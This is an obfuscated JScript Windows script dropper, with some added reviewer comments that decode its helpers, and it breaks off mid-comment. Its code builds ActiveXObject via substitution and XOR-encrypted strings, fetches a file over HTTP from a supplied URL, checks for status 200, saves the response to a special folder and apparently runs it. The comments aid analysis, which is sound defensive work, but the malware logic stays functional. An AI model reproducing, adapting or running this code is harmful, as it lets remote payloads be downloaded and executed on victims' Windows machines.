// Middle section (24 chars) of the taImARE() substitution alphabet.
function ODHUn()
{
    return "W<I?qgrv($lBT,'/EP0#DL: ";
}
// Final section (39 chars) of the taImARE() substitution alphabet.
function WxRB()
{
    return "p_@|VJfw6z=R;A)mj5Za31Hs!o->F.~&\\4X]dbh";
}
// Decode one character of obfuscated text: index into the 95-char alphabet
// (GzH + ODHUn + WxRB) at position (mPC - 31). The original buried the
// constant 31 in dead arithmetic: ((1785 + 5733) / 42) - 148 === 31.
function taImARE(mPC)
{
    var alphabet = GzH() + ODHUn() + WxRB();
    var offset = 31;
    return alphabet[AqFXJ(mPC)](mPC - offset);
}
function VqeCCr()
{
var UGkl=31333;
var FWboYO=26703;
return "l";
}
function gJMw()
{
var xKLiyqL=42015;
var hzHs="gsv$2=D";
return VqeCCr();
}
function wjSPrk()
{
var tTpEJ=12822;
var IEwmMjD=25431;
return "e";
}
function CUEa()
{
var NuAPmuT=9551;
var VizltF="HG%gU-Pi";
return wjSPrk();
}
function PeRYKj()
{
var PyDntxw="4O*y";
return ""+gJMw()+CUEa();
}
function oDIN()
{
return taImARE(3808/68+0);
}
function TPijTj()
{
return taImARE(5508/81+0);
}
function fQsUzpj()
{
var vaGUTk="0J$";
return ""+oDIN()+""+""+TPijTj();
}
function VAvpDg()
{
return taImARE(5*11);
}
function OIIV()
{
return taImARE(1375/11-0);
}
function Euh()
{
var tlMJfjf="I^i$5";
return VAvpDg()+""+""+OIIV();
}
function bqbfoV() {
var xOePw="";
xOePw=xOePw;
return xOePw;
}
function keBmjgg() {
var mIXmDTF="";
mIXmDTF=mIXmDTF;
return mIXmDTF;
}
function gViFz(jUVECf)
{
var rKFxU = PeRYKj();
var OnUlWT = fQsUzpj();
var ivoKpDQ = Euh();
rKFxU = rKFxU + bqbfoV() + OnUlWT + keBmjgg() + ivoKpDQ;
var lck = jUVECf[rKFxU];
return lck;
}
// Returns the host's ActiveXObject constructor: the concatenation below
// decodes, one character at a time via taImARE(), to the exact string
// "ActiveXObject", which is then eval()'d to look up the constructor.
// SECURITY: eval of a runtime-assembled string plus ActiveXObject usage is
// a strong indicator this file is an obfuscated Windows script dropper --
// do not execute it.
function VWDPPx(wJwoFU)
{
    var RMUIB="";
    // Each taImARE(...) call yields one char; the whole line == "ActiveXObject".
    RMUIB=RMUIB+taImARE(7800/78-0)+taImARE(16*3)+taImARE(369-314)+taImARE(1406/37-0)+taImARE(5950/85+0)+taImARE(627/11-0)+taImARE(866-745)+taImARE(272/8-0)+taImARE(413-289)+taImARE(103)+taImARE(283-226)+taImARE(16*3)+taImARE(853-798);
    var Otpbh = eval(RMUIB);
    // (30 > "29") coerces "29" to 29, so this is constant-true: always Otpbh.
    return (30>"29")?Otpbh:wJwoFU;
}
function TOzPsPM() {
var RpObN=76134;
var hLQW=RpObN+57282;
var aXK=hLQW/218;
var KAc=aXK-608;
return 0+KAc;
}
function JFN() {
var Szs=65489;
var isbJ=Szs+30943;
var pUprtlp=isbJ/168;
var EqJ=pUprtlp-574;
return 0+EqJ;
}
function wujRqoh()
{
return taImARE(6900/69+0);
}
function CVDe()
{
return taImARE(1743/21+0);
}
function qGFYl()
{
return taImARE(3094/91-0);
}
function GhRv()
{
var Rws="{8Q";
return ""+CVDe()+""+qGFYl();
}
function LcbW()
{
var Ilz="g~\"1(";
return wujRqoh()+""+""+GhRv();
}
function uMVmEzA()
{
return taImARE(1568/16-0);
}
function FFg()
{
return taImARE(6032/52+0);
}
function hVh()
{
var zcHEQU=5827;
return uMVmEzA()+""+FFg();
}
function QAx()
{
return taImARE(944-846);
}
function aThivF()
{
return taImARE(3*19);
}
function iJbmU()
{
var AUy="_8u)";
return QAx()+aThivF();
}
function PSD()
{
var AhXNH=53351;
return hVh()+iJbmU();
}
function tINT()
{
var ZKAszx="l[k";
return ""+LcbW()+""+PSD();
}
function lKAtYF()
{
return taImARE(1488/31-0);
}
function IPQws()
{
return taImARE(928-816);
}
function OpDgHnu()
{
return taImARE(4071/59-0);
}
function vtr()
{
var OUi="ZN#y";
return ""+IPQws()+""+OpDgHnu();
}
function dCpr()
{
var SpiLnj="|] ";
return ""+lKAtYF()+""+vtr();
}
function Vkiv()
{
return taImARE(7872/64+0);
}
function NRnqNJ()
{
return taImARE(3410/31-0);
}
function jBIC()
{
var hty=50598;
return ""+Vkiv()+""+NRnqNJ();
}
function pfU()
{
return taImARE(3*19);
}
function HNpfyo()
{
return taImARE(5*11);
}
function vInMYPe()
{
var YCJuP="#zvqU";
return ""+pfU()+""+HNpfyo();
}
function zfAzQ()
{
var UQh=" G'F?";
return ""+jBIC()+""+vInMYPe();
}
function USYAv()
{
var bGwts="*O.e";
return ""+dCpr()+""+zfAzQ();
}
function voWG()
{
var xdkotO="N5bk";
return ""+tINT()+USYAv();
}
function hhcqWs()
{
return taImARE(2976/32-0);
}
function xwbI()
{
return taImARE(2*19);
}
function fHY()
{
return taImARE(850-793);
}
function gBnx()
{
var IFit="wBGH";
return ""+xwbI()+""+fHY();
}
function KNFs()
{
var MByzIR="W^W=";
return ""+hhcqWs()+gBnx();
}
function bRmSCo()
{
return taImARE(4234/58-0);
}
function ONcu()
{
return taImARE(1968/16+0);
}
function GmmoLme()
{
return taImARE(10*11);
}
function CxipPxJ()
{
var zWWgU="^`u.B";
return ONcu()+GmmoLme();
}
function BASHuao()
{
var bIWZb=".v^q";
return ""+bRmSCo()+""+CxipPxJ();
}
function eMcnH()
{
var GBmXpm="%Yvt";
return ""+KNFs()+""+BASHuao();
}
function mvn()
{
return taImARE(202-115);
}
function YApmLX()
{
return taImARE(3*23);
}
function MSQmLK()
{
var UhRVVf="953";
return ""+mvn()+""+YApmLX();
}
function MUycBk()
{
return taImARE(4144/37-0);
}
function nUmcD()
{
return taImARE(261/3+0);
}
function bkK()
{
return taImARE(4560/80+0);
}
function jhSISPT()
{
var RRPEsAQ="W~E/,";
return nUmcD()+""+bkK();
}
function mOjKMa()
{
var CpaDvLc="SU&)B";
return MUycBk()+""+jhSISPT();
}
function fAnnOp()
{
var dcHJeMv=33047;
return MSQmLK()+""+mOjKMa();
}
function UprZcBx()
{
return taImARE(3*23);
}
function sxCO()
{
return taImARE(5*11);
}
function mXVCORn()
{
var DlasQ="?\\ ";
return UprZcBx()+sxCO();
}
function bqzGFZU()
{
return taImARE(222-184);
}
function iDCkNl()
{
return taImARE(437-380);
}
function cTQkqH()
{
return taImARE(6050/55+0);
}
function nIvjoLG()
{
var HHbC="zSw<T";
return ""+iDCkNl()+""+cTQkqH();
}
function iyXhA()
{
var MmmmFQ="w{*";
return ""+bqzGFZU()+""+nIvjoLG();
}
function vhRwA()
{
var Lrafnz="b#m";
return mXVCORn()+""+""+iyXhA();
}
function FeTnXuu()
{
var dDWJRD="W+k=Q";
return fAnnOp()+""+vhRwA();
}
function QBFZ()
{
return taImARE(2622/38-0);
}
function XVM()
{
return taImARE(969/17-0);
}
function VtpeB()
{
return taImARE(10*11);
}
function xvTVxy()
{
var jAi=13186;
return XVM()+""+VtpeB();
}
function DPplIcR()
{
var uJBxc="B7+L^";
return ""+QBFZ()+xvTVxy();
}
function PpgHPi()
{
return taImARE(3053/71+0);
}
function cUN()
{
return taImARE(2968/53-0);
}
function dnIACa()
{
return taImARE(4416/92-0);
}
function xIVrqdw()
{
var UjC="+)WJ";
return cUN()+""+dnIACa();
}
function RmmCF()
{
var rQl="*#z";
return PpgHPi()+xIVrqdw();
}
function Oddxo()
{
var twHj="Ly(KW";
return ""+DPplIcR()+""+RmmCF();
}
function owFqDm(uWBvgMR)
{
var buUxRK = "";
var Wolx = 0;
util_log("Starting owFqDm("+uWBvgMR+")");
if (uWBvgMR == 0)
return false;
var AjkQn = VWDPPx(uWBvgMR+TOzPsPM());
var GWs = JFN();
try
{
GWs = new String;
}
catch (GvFUYRg)
{
}
GWs = new AjkQn(voWG());
util_log("owFqDm 2");
var vLfcU="";
vLfcU=vLfcU+taImARE(2376/72-0)+taImARE(8*7)+taImARE(150-118)+taImARE(693-637)+taImARE(10752/96+0)+taImARE(845-751)+taImARE(8*7);
util_log({vLfcU:vLfcU});
var dIardI = vLfcU;
var UwgL = eMcnH();
util_log("owFqDm 3");
var CLKeeH = 10;
CLKeeH = typeof GWs[FeTnXuu()];
util_log({CLKeeH:CLKeeH, GWs: GWs, FeTnXuu:FeTnXuu()});
if (CLKeeH["charAt"](2) == "j")
{
util_log({UwgL: UwgL, "Oddxo()":Oddxo()});
CLKeeH = typeof GWs[UwgL][Oddxo()];
util_log({CLKeeH:CLKeeH});
}
util_log({CLKeeH:CLKeeH, dIardI:dIardI});
//if (CLKeeH != dIardI)
// return false;
util_log("owFqDm 5");
function oHtyt() {
var kYSVsfS="";
kYSVsfS=kYSVsfS+taImARE(2280/60-0)+taImARE(990/18-0)+taImARE(2850/50-0)+taImARE(714/7+0);
return kYSVsfS;
}
util_log("owFqDm 6");
CLKeeH = typeof GWs[UwgL][oHtyt()];
util_log({UwgL:UwgL, "oHtyt()":oHtyt()})
function FbCNk() {
var BwXyBMd="";
BwXyBMd=BwXyBMd+taImARE(2871/87-0)+taImARE(523-467)+taImARE(128/4+0)+taImARE(8*7)+taImARE(672/6+0)+taImARE(4230/45+0)+taImARE(4928/88+0);
return BwXyBMd;
}
util_log("owFqDm 7");
dIardI = FbCNk();
var qHqVwFX = (CLKeeH == dIardI);
util_log({CLKeeH:CLKeeH, dIardI:dIardI})
util_log("owFqDm 8");
util_log({qHqVwFX: qHqVwFX})
return qHqVwFX;
}
function jZPqd(EUg)
{
return EUg;
}
function igX(aav, WSidhgh)
{
var CJMo=136242;
var gYtx=CJMo+5242;
var smh=gYtx/326;
var Jta=smh-433;
var uJnel = Jta;
var MuoV=28979;
var NxYZWh=MuoV+4663;
var hGNr=NxYZWh/623;
var HEugAOU=hGNr-54;
var XUtbe = HEugAOU;
var feJTH=132721;
var AspNZAV=feJTH+36076;
var pfrhLp=AspNZAV/179;
var lMocl=pfrhLp-936;
var aNApGkD = lMocl;
var GXpbtir="";
GXpbtir=GXpbtir+taImARE(6264/72+0)+taImARE(53*2)+taImARE(1035-966)+taImARE(1022-912)+taImARE(3*19)+taImARE(4615/71-0)+taImARE(340-284)+taImARE(3630/66-0);
var IPr = GXpbtir;
var eHU="";
eHU=eHU+taImARE(16*3)+taImARE(1111-986)+taImARE(646-540)+taImARE(6831/99+0)+taImARE(352-252)+taImARE(1100/20+0);
var gBwuPqS = eHU;
aNApGkD = eval((Math.cos(uJnel + 0) > 0)?IPr:gBwuPqS);
if (Math.sin(uJnel) > XUtbe)
{
var peuMD = aNApGkD(jZPqd(aav), WSidhgh);
var OnJ=334942;
var Vcf=OnJ+1343;
var CAP=Vcf/477;
var xPodsat=CAP-663;
var AKkby = xPodsat;
return peuMD;
}
else
return uJnel;
}
// Bitwise XOR of the two operands -- the core primitive of the string
// de-obfuscation routine (TgqZmHg).
function rTeb(byteValue, keyValue)
{
    var mixed = byteValue ^ keyValue;
    return mixed;
}
// Assembles the method name "GetSpecialFolder" (a Scripting.FileSystemObject
// method) from shuffled string fragments. The arithmetic in the original
// was dead code and has been dropped; the returned value is identical.
function daE()
{
    var parts = ["e","tS","alF","pec","i","ld","o","r","Ge"];
    var order = [8, 1, 3, 4, 2, 6, 5, 0, 7];
    var name = "";
    for (var i = 0; i < order.length; i++) {
        name += parts[order[i]];
    }
    return name;
}
function bUBQdl(embjeLY)
{
var CwLQG=354316;
var qcuQnIj=CwLQG+3254;
var widutEI=qcuQnIj/435;
var mMZ=widutEI-694;
var Non = mMZ;
var WyWhCR="";
WyWhCR=WyWhCR+taImARE(718-662)+taImARE(163-51)+taImARE(5*11);
var ITAJioB = WyWhCR;
try
{
var MKals="";
MKals=MKals+taImARE(7*17);
var lxDghTY="";
lxDghTY=lxDghTY+taImARE(410/10-0)+taImARE(3648/64-0)+taImARE(2585/47+0)+taImARE(7050/94-0)+taImARE(2052/36-0)+taImARE(6426/63-0)+taImARE(1131/13-0)+taImARE(4100/82+0)+taImARE(4028/38+0)+taImARE(10098/99+0)+taImARE(919-862);
ITAJioB = MKals + embjeLY[lxDghTY]();
var hPorMxn="";
hPorMxn=hPorMxn+taImARE(16*3)+taImARE(25*5)+taImARE(2014/19+0)+taImARE(2415/35-0)+taImARE(500/5-0)+taImARE(5*11);
util_log({Non:Non, hPorMxn:hPorMxn})
var NDEfDs=22958;
var BBXHdk=NDEfDs+13336;
var owOjq=BBXHdk/138;
var iBdmX=owOjq-7;
ITAJioB = ITAJioB + Non[hPorMxn](iBdmX);
}
catch (ypdsK)
{
ITAJioB = embjeLY[daE()](2) + ITAJioB;
}
return ITAJioB;
}
function nAc(kqcUahR, RSIf, poOQ, SrQGqB)
{
var vtS=341669;
var SnMuRRP=vtS+17108;
var JEtMFAH=SnMuRRP/437;
var VRcVJB=JEtMFAH-821;
var ElPnI = VRcVJB;
if (kqcUahR > ElPnI)
{
kqcUahR = ElPnI;
}
var YkD="";
YkD=YkD+taImARE(10*11)+taImARE(1564/23-0)+taImARE(4920/40+0)+taImARE(255-152)+taImARE(155-30)+taImARE(6784/64+0)+taImARE(7260/66-0)+taImARE(6732/99-0)+taImARE(25*5)+taImARE(41*3)+taImARE(3399/33+0);
var TrG = YkD;
var Rzfd="";
Rzfd=Rzfd+taImARE(378/6-0)+taImARE(110/1-0)+taImARE(16*3)+taImARE(3036/44-0)+taImARE(3382/89+0)+taImARE(3*29)+taImARE(2860/52-0)+taImARE(4*29)+taImARE(703-642)+taImARE(25*5)+taImARE(864-807)+taImARE(73)+taImARE(727-654);
TrG = new RSIf(Rzfd);
TrG[SrQGqB](poOQ, kqcUahR);
var VDd=192518;
var qaTqAa=VDd+14746;
var mQw=qaTqAa/272;
var LUTKs=mQw-754;
var ITAJioB = LUTKs;
return ITAJioB;
}
function JLmAt(ruhNnUN, RSIf, poOQ, SrQGqB)
{
var TBghuKs="";
TBghuKs=TBghuKs+taImARE(365/5+0)+taImARE(3*19)+taImARE(4592/82+0)+taImARE(4*17)+taImARE(2090/38-0)+taImARE(11125/89+0);
var efSoCjr = ruhNnUN[TBghuKs];
var iHWiReW=704723;
var aoUbv=iHWiReW+4712;
var icSvu=aoUbv/995;
var ctvNRbf=icSvu-706;
var QBRh = ctvNRbf;
var Yvo=228618;
var EGWDjXd=Yvo+52344;
var gRtgPsc=EGWDjXd/594;
var SjsC=gRtgPsc-468;
var udlRWNE = SjsC;
var Piuxxr = SrQGqB;
if (efSoCjr == QBRh)
{
var gmGNNO="";
gmGNNO=gmGNNO+taImARE(3036/44+0)+taImARE(432-399)+taImARE(533-477);
Piuxxr = gmGNNO;
}
if (efSoCjr == udlRWNE)
{
var EKqpGl = efSoCjr * udlRWNE;
return nAc(EKqpGl, RSIf, poOQ, SrQGqB);
}
var RoavpeB="";
RoavpeB=RoavpeB+taImARE(322-212)+taImARE(2079/63-0)+taImARE(1364/11+0)+taImARE(1100/10-0)+taImARE(256-201)+taImARE(3*23)+taImARE(351-313)+taImARE(8*7)+taImARE(784-716);
var yjUe=141647;
var HgYhn=yjUe+60997;
var ppcPSmQ=HgYhn/468;
var FQcaGR=ppcPSmQ-433;
var uzKk=99755;
var VHGuYy=uzKk+44373;
var SlPLuA=VHGuYy/256;
var ahxw=SlPLuA-562;
var JBCGM = ruhNnUN[RoavpeB](FQcaGR, efSoCjr - ahxw);
return JLmAt(JBCGM, RSIf, poOQ, Piuxxr);
}
function xTxkq(frwePNo)
{
var DrigSl="";
DrigSl=DrigSl+taImARE(4347/69-0)+taImARE(7260/66+0)+taImARE(4272/89+0)+taImARE(1932/28+0)+taImARE(1025-987)+taImARE(4959/57+0)+taImARE(5*11)+taImARE(4*29)+taImARE(122/2+0)+taImARE(25*5)+taImARE(176-119)+taImARE(2847/39-0)+taImARE(6643/91+0);
var Mjqvj = new frwePNo(DrigSl);
return Mjqvj;
}
function wKU() {
var kRIuDKO=264882;
var OJZ=kRIuDKO+840;
var gBztA=OJZ/402;
var NNoIKT=gBztA-661;
return NNoIKT+0;
}
function UQPsRs() {
var DBRDc="";
DBRDc=DBRDc;
return DBRDc;
}
function tZllJ() {
var pTQik=330443;
var fmMI=pTQik+11829;
var xEh=fmMI/764;
var axLj=xEh-448;
return 0+axLj;
}
function xQPSW() {
var NERDbG=200470;
var xEvRloH=NERDbG+28382;
var Jrbw=xEvRloH/326;
var GLPDZVx=Jrbw-700;
return 0+GLPDZVx;
}
function zaOSBy() {
var fqFsV="";
fqFsV=fqFsV+taImARE(916-868)+taImARE(270-145)+taImARE(761-655)+taImARE(1069-1000)+taImARE(417-317)+taImARE(5*11);
return fqFsV;
}
function wBem() {
var FiKIJ="";
FiKIJ=FiKIJ+taImARE(389-341)+taImARE(501-376)+taImARE(53*2)+taImARE(2622/38+0)+taImARE(6100/61+0)+taImARE(4235/77-0);
return FiKIJ;
}
function ligL() {
var ksO=58357;
var BhkD=ksO+18244;
var PgkuRIi=BhkD/353;
var tASr=PgkuRIi-216;
return tASr+0;
}
function exwGC() {
var qgL=410827;
var TQMbP=qgL+53315;
var ksgShoC=TQMbP/903;
var jONS=ksgShoC-498;
return jONS+0;
}
function fzd() {
var GaSG="";
GaSG=GaSG+taImARE(732-684)+taImARE(4125/33+0)+taImARE(3922/37-0)+taImARE(3*23)+taImARE(233-197)+taImARE(469-357)+taImARE(9225/75+0)+taImARE(912/16+0)+taImARE(2500/25+0)+taImARE(5*11);
return GaSG;
}
function hXMdt() {
var eKJMwp="";
eKJMwp=eKJMwp+taImARE(232-139)+taImARE(482-413)+taImARE(16*7)+taImARE(7548/74+0)+taImARE(12*3)+taImARE(10000/80-0)+taImARE(2226/21-0)+taImARE(806-737)+taImARE(3240/90+0)+taImARE(313-201)+taImARE(277-154)+taImARE(999-942);
return eKJMwp;
}
// XOR-decrypts an obfuscated string.
// XyhuR:   ciphertext encoded as hex byte pairs (two chars per byte).
// OPBdAhs: repeating key string.
// For each pair of hex digits: byte = parseInt(pair, 16), then the byte is
// XORed with the key character at (byteIndex % keyLength) and appended as a
// character. The helper thunks resolve to constants/names: gViFz -> the
// "length" property, wKU() -> 0, xQPSW() -> 2, ligL() -> 1, exwGC() -> 16
// (the parseInt radix), zaOSBy()/wBem() -> "charAt", fzd() -> "charCodeAt",
// hXMdt() -> "fromCharCode", igX -> parseInt, rTeb -> XOR, and
// [UQPsRs()][tZllJ()] -> "" (the empty accumulator).
function TgqZmHg(XyhuR, OPBdAhs)
{
    var xHhAv = gViFz(XyhuR);              // ciphertext length (hex chars)
    var DRc = wKU();                       // cursor, starts at 0
    var mSZfqO = gViFz(OPBdAhs);           // key length
    var byfgIKA = [UQPsRs()][tZllJ()];     // "" accumulator
    while (DRc < xHhAv)
    {
        var eWk = DRc / xQPSW();           // byte index = cursor / 2
        var YlW = XyhuR[zaOSBy()](DRc);    // first hex digit
        DRc++;
        YlW = YlW + XyhuR[wBem()](DRc);    // second hex digit
        DRc = DRc + ligL();                // advance past the pair
        var kfKCj = igX(YlW, exwGC());     // parseInt(pair, 16)
        var iehRuVT = OPBdAhs[fzd()](eWk % mSZfqO); // key char code
        var AXrUUP = rTeb(kfKCj, iehRuVT); // XOR byte with key
        var cvxQ = String[hXMdt()](AXrUUP);// back to a character
        byfgIKA = byfgIKA + cvxQ;
    }
    return byfgIKA;
}
function KMgrYeW(oBi, pAP, RSIf)
{
var Bhk=637605;
var YOWY=Bhk+35000;
var nwKVzHS=YOWY/965;
var Wgm=nwKVzHS-687;
var iJh = Wgm;
var cbjr="";
cbjr=cbjr+taImARE(5280/44-0)+taImARE(730-695)+taImARE(8*13)+taImARE(1*31)+taImARE(917-834)+taImARE(5457/51-0)+taImARE(47*2)+taImARE(3087/49+0)+taImARE(6762/69-0)+taImARE(2695/55+0)+taImARE(103)+taImARE(8360/76-0)+taImARE(3828/66+0)+taImARE(712-587)+taImARE(16*3);
var aGCng=TgqZmHg("662E543D",cbjr);
var nwScG = oBi[aGCng]();
var talev="";
talev=talev+taImARE(158-127)+taImARE(8613/99-0)+taImARE(748-623)+taImARE(5800/100-0)+taImARE(5184/54+0)+taImARE(359-285)+taImARE(698-623)+taImARE(4*17)+taImARE(428-390)+taImARE(4876/46+0)+taImARE(2208/23+0);
var wPXU=TgqZmHg("0A191228",talev);
var ngpIDG = oBi[wPXU];
var NrDE=474263;
var CfcJQoZ=NrDE+3838;
var DEAXf=CfcJQoZ/507;
var RRcQn=DEAXf-742;
var GpCV = RRcQn;
var TetiHXd=["E","nw","TDX","4xV","x","z6z","b","c","o","q","A"];
var bSSSb=TetiHXd[3]+TetiHXd[7]+TetiHXd[4]+TetiHXd[1]+TetiHXd[5]+TetiHXd[6]+TetiHXd[9]+TetiHXd[2]+TetiHXd[10]+TetiHXd[0]+TetiHXd[8];
var mIdk=TgqZmHg("753C19273A40251F5515101527212C",bSSSb);
var CnhTkNb = new RSIf(mIdk);
var oqG="";
oqG=oqG+taImARE(3*11)+taImARE(2622/46+0)+taImARE(586-462)+taImARE(920/10+0)+taImARE(107)+taImARE(3096/86-0)+taImARE(4968/46+0)+taImARE(260/4+0)+taImARE(1496/44+0)+taImARE(67)+taImARE(7200/96-0)+taImARE(87-52)+taImARE(1350/27+0);
var HqYuckO=TgqZmHg("170C0C",oqG);
var OSELjK = HqYuckO;
var AEWPI=TgqZmHg("2D042E26091E","KmKJmmjVbqHhNfOkW");
var pTuLW=TgqZmHg("1303220B1F06","rsRnqbU6CkMYBk6U");
CnhTkNb[AEWPI][pTuLW](OSELjK, GpCV, ngpIDG);
var lsnT=TgqZmHg("2A12552C","Eb0BY9i92K");
CnhTkNb[lsnT]();
var TGdH=TgqZmHg("07213E790206","fEZ7gqmMM6dYtbg2");
util_log({CnhTkNb:CnhTkNb, TGdH:TGdH});
CnhTkNb[TGdH]();
var EwV=TgqZmHg("0720402E0A0E2A10383821","fP0KdjixMVJKbg");
util_log({CnhTkNb:CnhTkNb, OSELjK:OSELjK, EwV:EwV, nwScG:nwScG});
CnhTkNb(OSELjK)[EwV](nwScG);
var kgCUeX=["jGO","cv","Y","2","Q","wmO","cx4","Mt","tht"];
var Fddd=kgCUeX[8]+kgCUeX[5]+kgCUeX[0]+kgCUeX[1]+kgCUeX[6]+kgCUeX[2]+kgCUeX[4]+kgCUeX[7]+kgCUeX[3];
var mZqk=TgqZmHg("01181016192A",Fddd);
CnhTkNb[mZqk]();
var blkbK=TgqZmHg("27262F0533","QGCpVQ5fZ6f");
nwScG = CnhTkNb(OSELjK)[blkbK];
var orp=TgqZmHg("01300006365D","mUnaB5ucbhSgcGqReNd");
var MQTr = nwScG[orp];
if (MQTr > iJh)
{
var xili=TgqZmHg("6412000B3016000C3B3D","7svndyFeWXuobmpzpx");
oBi[xili](pAP);
return true;
}
else return false;
}
function girBemK(cfx)
{
var IIwB="";
IIwB=IIwB+taImARE(463-420)+taImARE(3795/55+0)+taImARE(3528/72-0)+taImARE(2*37)+taImARE(3115/89+0)+taImARE(200-139)+taImARE(176-96)+taImARE(2436/28-0)+taImARE(9*7)+taImARE(4473/71-0)+taImARE(317-223)+taImARE(790-749)+taImARE(1972/29+0)+taImARE(134-96)+taImARE(840-731)+taImARE(43)+taImARE(6930/66-0)+taImARE(12*7)+taImARE(354-281)+taImARE(73);
var JEqvT = "3421610F07617E281A1B3F133339";
var KSqFdmc=TgqZmHg(JEqvT,IIwB);
var Mjqvj = new cfx(KSqFdmc);
return Mjqvj;
}
function aYdA(orZl, VTZO)
{
var DnfCjtu="";
DnfCjtu=DnfCjtu+taImARE(670-636)+taImARE(79)+taImARE(630/6-0)+taImARE(1323/21-0)+taImARE(819/9+0)+taImARE(2870/70-0)+taImARE(2052/57-0)+taImARE(8200/82+0)+taImARE(963-879)+taImARE(5040/60-0)+taImARE(20*5)+taImARE(377-332)+taImARE(16*5);
var ojgRYC = "20353F39";
var GPwug=TgqZmHg(ojgRYC,DnfCjtu);
var itnGtkQ="";
itnGtkQ=itnGtkQ+taImARE(4850/97+0)+taImARE(4715/41+0)+taImARE(8505/81-0)+taImARE(378/7-0)+taImARE(672/8-0)+taImARE(12*3)+taImARE(12*3)+taImARE(730-680)+taImARE(1002-950)+taImARE(2665/65-0)+taImARE(728-620)+taImARE(5*19)+taImARE(598-531)+taImARE(210/5+0)+taImARE(32*3)+taImARE(686-571)+taImARE(11036/89+0)+taImARE(1665/45-0)+taImARE(2*29)+taImARE(420-388);
var CFC = "09030E";
var ymfCnu=TgqZmHg(CFC,itnGtkQ);
var skQrsO=293273;
var mBY=skQrsO+27271;
var EnjT=mBY/504;
var snak=EnjT-636;
orZl[GPwug](ymfCnu, VTZO, snak);
try {
var VriFZJ=["G","G9T","T","CY","HN","i8","JQ1","UDc"];
var YTllka=VriFZJ[7]+VriFZJ[3]+VriFZJ[0]+VriFZJ[6]+VriFZJ[1]+VriFZJ[5]+VriFZJ[4]+VriFZJ[2];
var ECwIk = "26210D27";
var dqzZ=TgqZmHg(ECwIk,YTllka);
orZl[dqzZ]();
} catch (dKi) {
return 0;
}
return 1;
}
function yRtn(okz)
{
var MfHRx=TgqZmHg("2A35463C3834","kV2UNQuzI65");
var edzdrkZ = MfHRx + okz;
var JzF = eval(edzdrkZ);
var zovl="";
zovl=zovl+taImARE(7636/83-0)+taImARE(8712/72+0)+taImARE(3*31)+taImARE(987-956)+taImARE(73)+taImARE(9*7)+taImARE(5200/65-0)+taImARE(883-842)+taImARE(4000/80-0)+taImARE(5*11)+taImARE(10*7)+taImARE(2546/38+0)+taImARE(3910/34+0)+taImARE(15*7)+taImARE(825/15-0)+taImARE(3*31)+taImARE(32*3)+taImARE(7*7);
var riaDk=TgqZmHg("023D0A35037727283C181250",zovl);
var BdegmoZ=187320;
var jrlSR=BdegmoZ+47390;
var LzmuxAw=jrlSR/245;
var kiMP=LzmuxAw-916;
var UdzoY = riaDk + kiMP;
if (UdzoY==edzdrkZ)
{
return okz;
}
else
{
return "7"?JzF:"9";
}
}
function nDWpqY(tYnE, orZl)
{
var wxhFztl=TgqZmHg("76322E3B","9BKUDa1jXM7HmNhF4eY");
tYnE[wxhFztl]();
var cFy=TgqZmHg("1D4E1A1C","I7jynJHnBRvfUv3P1ls");
tYnE[cFy] = 1;
var qmqQDyl=TgqZmHg("162618055A053F0E170B203A","DCku5kLkUd");
var KTupLIG = orZl[qmqQDyl];
var VZDQl=TgqZmHg("31343D1006","fFTdcNhuAobqudNL1RV");
tYnE[VZDQl](KTupLIG);
var tMEVUi=TgqZmHg("3317382A3C3D352D","cxKCHTZCsPBe73g");
tYnE[tMEVUi] = 0;
}
function wnN(RSIf, orZl)
{
var vLxbrt=TgqZmHg("1F5134222603191C5465302807331F4B353F331A3F10592E1535","L2FKVwpr3KvAkV");
var YAw = new RSIf(vLxbrt);
var oeUD=TgqZmHg("0D3335107B5A38012A2E0C1D","LwzT9tkuXKmpQ2R2g");
var fJd = new RSIf(oeUD);
var NdQ = bUBQdl(YAw);
nDWpqY(fJd, orZl);
if (!KMgrYeW(fJd, NdQ, RSIf))
return 11;
var bGH=TgqZmHg("762719185C","5Kvk9qFoxt70zX8qepm");
fJd[bGH]();
var pndgJ=TgqZmHg("0224534057171557575365","aI7n2opwx0Efdtqde3E6");
var YlHW = pndgJ + NdQ;
var Tki=TgqZmHg("331838000A5439040C2E6526091F210F210B17","RkImd0JndWRGny");
var etjjw=TgqZmHg("785F0B74","In9G7T8RCMl");
var jRCDSEu = JLmAt(Tki, RSIf, YlHW, etjjw);
if (jRCDSEu < 10)
{
var OdZ=TgqZmHg("033F3202101A17","TlQpyjc6kh39");
var mCYcmF = eval(OdZ);
var rxZ=TgqZmHg("060A033D03451C39031508131E32","UiqTs1ZLoyFrsW");
var znX = mCYcmF[rxZ];
var RWG=TgqZmHg("5C3F0603392D1C035F1C","8ZjfMHZj3yj5EFsR5Wt");
YAw[RWG](znX);
return true;
}
return jRCDSEu;
}
function lZrMQfe(tvFAk)
{
var vqfP = "3" + "\x41" + "0" + "\x37" + "\x30" + "1" + "\x30" + "\x42" + "5" + "0" + "\x35" + "\x37";
vqfP += "11";
var zmuy=TgqZmHg(vqfP,"bHca54eWiY");
var Otpbh = yRtn(zmuy);
var BmxEAQp = xTxkq(Otpbh);
var SEh = girBemK(Otpbh);
if (aYdA(SEh, tvFAk) == 0)
return false;
var QIja = "\x31" + "\x32" + "\x30" + "5" + "\x35" + "\x31" + "\x31" + "D" + "\x33" + "A" + "1" + "9";
var CYcUWHU=TgqZmHg(QIja,"Aq0iOjmVftxE");
var KyBFfA = SEh[CYcUWHU];
var MlfoYdV = 200;
if (KyBFfA == MlfoYdV) {
var jRCDSEu = wnN(Otpbh, SEh);
var MdkcDxu=101069;
var DARuj=MdkcDxu+5653;
var dYl=DARuj/231;
var VSCUVe=dYl-452;
var otj = VSCUVe;
if (jRCDSEu < otj)
{
return true;
}
else
{
return false;
}
}
else {
return false;
}
return true;
}
function Urza(VTZO, KmktwB)
{
try
{
var zfhUWxJ = lZrMQfe(VTZO);
throw ((5 > 4)?((18 > 2)?zfhUWxJ:""):1);
}
catch(OZTgXL)
{
if (true && OZTgXL) return OZTgXL;
var oKW = "0123456789";
var tOTOc = "14\x30\x425A\x33\x32150\x35";
var TXY=TgqZmHg(tOTOc,"xn4UamvmMcmdv");
var IbsGE=7288;
var Wvf=IbsGE+21753;
var MqjlM=Wvf/257;
var UShuSV=MqjlM-109;
var rgMUd = (oKW[TXY] < UShuSV);
return rgMUd;
}
return KmktwB;
}
// Constant gate consulted by the main loop; always reports "enabled" (1).
function OcRSCv()
{
    return Number(true);
}
// NOTE(review): obfuscated two-entry lookup-table builder of unknown
// provenance. Both entries are decoded at runtime by the project helpers
// TgqZmHg/taImARE (defined elsewhere in this file); what the decoded
